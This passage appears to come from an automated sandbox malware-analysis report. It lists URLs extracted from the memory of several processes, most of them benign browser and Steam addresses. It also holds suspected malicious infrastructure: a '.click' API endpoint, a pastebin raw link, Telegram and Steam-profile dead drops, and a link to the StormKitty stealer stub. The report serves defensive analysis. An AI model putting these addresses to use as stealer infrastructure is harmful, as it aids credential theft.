Source: chrome.exe, 0000001E.00000002.4131718103.0000599C013F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 0000001E.00000002.4131718103.0000599C013F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 0000001E.00000002.4124349131.0000599C00CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4125334358.0000599C00DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000001E.00000002.4124349131.0000599C00CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000001E.00000002.4124349131.0000599C00CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000001E.00000002.4124349131.0000599C00CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000001E.00000002.4124349131.0000599C00CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000001E.00000002.4124349131.0000599C00CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000001E.00000002.4124349131.0000599C00CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4125334358.0000599C00DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000001E.00000002.4124349131.0000599C00CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: dea82620d5.exe, 00000034.00000003.3955280702.0000000003859000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/apiSJBk
Source: dea82620d5.exe, 00000034.00000003.3955280702.0000000003859000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/api
Source: t0IHakP.exe, 0000001D.00000002.4813359985.000000000311A000.00000004.00000800.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000002.4813359985.00000000035E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: t0IHakP.exe, 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, t0IHakP.exe, 0000001D.00000002.4813359985.000000000311A000.00000004.00000800.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000002.4813359985.00000000035E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B75u64B
Source: t0IHakP.exe, 0000001D.00000002.4813359985.00000000035E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B7P
Source: chrome.exe, 0000001E.00000003.3596306857.0000599C0100F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4121988552.0000599C0096F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4122333271.0000599C009C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 0000001E.00000002.4122333271.0000599C009C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: skotes.exe, 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: chrome.exe, 0000001E.00000002.4059390222.0000599C0008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000001E.00000002.4119831384.0000599C0076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000001E.00000002.4119831384.0000599C0076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4119744409.0000599C00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527707379.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535546010.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527707379.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 52ba7a538c.exe, 00000014.00000002.3406687450.0000000001CDC000.00000004.00001000.00020000.00000000.sdmp, 52ba7a538c.exe, 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp, 52ba7a538c.exe, 00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
Source: BitLockerToGo.exe, 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2993564902.000000000BC07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 52ba7a538c.exe, 00000014.00000002.3406687450.0000000001CDC000.00000004.00001000.00020000.00000000.sdmp, 52ba7a538c.exe, 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp, 52ba7a538c.exe, 00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4620113858.000000000044D000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3424409723.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B7B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3424409723.0000000002BAE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael
Source: BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael/
Source: BitLockerToGo.exe, 0000001A.00000003.3424409723.0000000002BAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04aeld
Source: BitLockerToGo.exe, 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
Source: BitLockerToGo.exe, 0000001A.00000003.3424409723.0000000002BAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: i8Vwc7iOaG.exe, 00000000.00000003.2179307012.0000000005A30000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2179154912.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3160365317.000000000B990000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005D16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4652908614.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: i8Vwc7iOaG.exe, 00000000.00000003.2179307012.0000000005A30000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2179154912.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3160365317.000000000B990000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005D16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4652908614.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000001E.00000002.4123897804.0000599C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000001E.00000002.4123897804.0000599C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 0000001E.00000002.4123897804.0000599C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000001E.00000003.3595720806.0000599C00D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3592693960.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000001E.00000002.4130607494.0000599C010D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000001E.00000003.3597501813.0000599C00EB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 0000001E.00000003.3614539196.0000599C00EB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 0000001E.00000002.4058943631.0000599C0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 0000001E.00000002.4063003075.0000599C004D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000001E.00000002.4131852283.0000599C01414000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000001E.00000003.3646582329.0000599C014A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4131852283.0000599C01414000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000001E.00000002.4131718103.0000599C013F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 0000001E.00000002.4131718103.0000599C013F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000DA7000.00000040.00000001.01000000.00000006.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000CC4000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000DA7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/DBKJJKEBFBFH
Source: BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000DA7000.00000040.00000001.01000000.00000006.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000CC4000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000DA7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000CC4000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: i8Vwc7iOaG.exe, 00000000.00000003.2178845206.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2993564902.000000000BC07000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: i8Vwc7iOaG.exe, 00000000.00000003.2178845206.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2993564902.000000000BC07000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000CC4000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: i8Vwc7iOaG.exe, 00000000.00000003.2178845206.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2993564902.000000000BC07000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3141398938.0000000000CC4000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: soonmaintain.exe, 00000019.00000000.3354049958.000001C593ED2000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: soonmaintain.exe, 00000019.00000000.3354049958.000001C593ED2000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: chrome.exe, 0000001E.00000002.4123307155.0000599C00B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 0000001E.00000002.4123307155.0000599C00B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000001E.00000002.4123307155.0000599C00B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca&

